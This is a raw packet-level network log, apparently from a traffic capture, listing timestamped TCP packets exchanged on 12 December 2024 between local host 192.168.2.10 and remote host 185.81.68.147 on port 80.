                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.856281042 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.856956005 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.857301950 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.857352972 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.857877970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.858078003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.858122110 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.858834028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.859154940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.859206915 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.859935045 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.000009060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.000073910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.000072002 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.000399113 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.000437021 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.000472069 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.001421928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.001457930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.001466990 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.002641916 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.002655983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.002692938 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.003441095 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.003493071 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.003571033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.004472017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.004512072 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.004626989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.005470991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.005520105 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.005968094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.006597996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.006611109 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.006633997 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.007544994 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.007556915 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.007596970 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.008521080 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.008584023 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.009594917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.009607077 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.009627104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.009660959 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.010585070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.010637999 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.011013985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.011603117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.011615038 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.011646032 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.012639046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.012674093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.012676954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.013648033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.013731956 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.013936996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.014636993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.014697075 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.015666008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.015693903 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.015706062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.015750885 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.016659975 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.016768932 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.016916990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.017676115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.017724991 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.018551111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.018744946 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.018758059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.018790007 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.019710064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.019783974 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.019978046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.020724058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.020757914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.020771980 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.021817923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.021862030 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.021910906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.022768974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.022893906 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.023272991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.023803949 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.023864985 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.023911953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.024796963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.024854898 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.024868965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.025811911 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.026823997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.026835918 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.026869059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.026891947 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.026916981 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.027852058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.027863979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.027898073 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.028891087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.028903008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.028955936 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.029844999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.030864954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.030879974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.030901909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.030926943 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.031424046 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.031862974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.031908989 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.032913923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.032927036 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.032952070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.032977104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.033955097 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.034244061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.034303904 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.034965038 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.035711050 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.035764933 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.035944939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.035986900 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.036976099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.036997080 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.037014008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.037055016 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.037972927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.038021088 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.038180113 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.039045095 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.039150953 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.039161921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.040004969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.041053057 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.041064024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.041106939 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.041115999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.041131973 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.042036057 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.042077065 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.042319059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.042521954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.043045998 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.043057919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.043081045 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.044028044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.044080019 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.044486046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.045066118 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.045114040 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.045119047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.046109915 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.046153069 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.046319008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.047120094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.047178030 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.047939062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.048127890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.048140049 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.048178911 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.049232006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.049245119 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.049303055 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.050167084 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.050208092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.050230980 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.051141977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.051203012 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.051650047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.052205086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.053159952 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.053170919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.053236961 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.192270994 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.192413092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.192470074 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.192742109 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.192903042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.192946911 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.193690062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.194452047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.194502115 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.194746971 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.194785118 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.194885015 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.195704937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.195894957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.195950985 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.196715117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.196734905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.197007895 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.197757006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.198251963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.198303938 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.198827982 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.199244976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.199290991 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.199925900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.200095892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.200140953 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.200910091 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.201034069 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.201083899 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.201899052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.201944113 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.202099085 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.202814102 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.203392029 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.203478098 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.203815937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.203953028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.204010963 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.204833031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.205122948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.205171108 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.205841064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.206703901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.206759930 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.206923962 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.207076073 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.207123041 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.207901001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.207981110 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.208044052 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.208900928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.209006071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.209068060 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.209928036 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.210028887 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.210083008 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.210933924 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.211220026 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.211277962 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.211999893 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.212014914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.212070942 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.212971926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.214029074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.214044094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.214093924 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.214102030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.214170933 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.214998007 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.215797901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.215851068 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.216025114 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.216145039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.217065096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.217077971 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.217113018 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.217143059 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.218070030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.218082905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.218127966 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.219142914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.219156981 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.219206095 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.220046043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.220282078 CET8049946185.81.68.147192.168.2.10
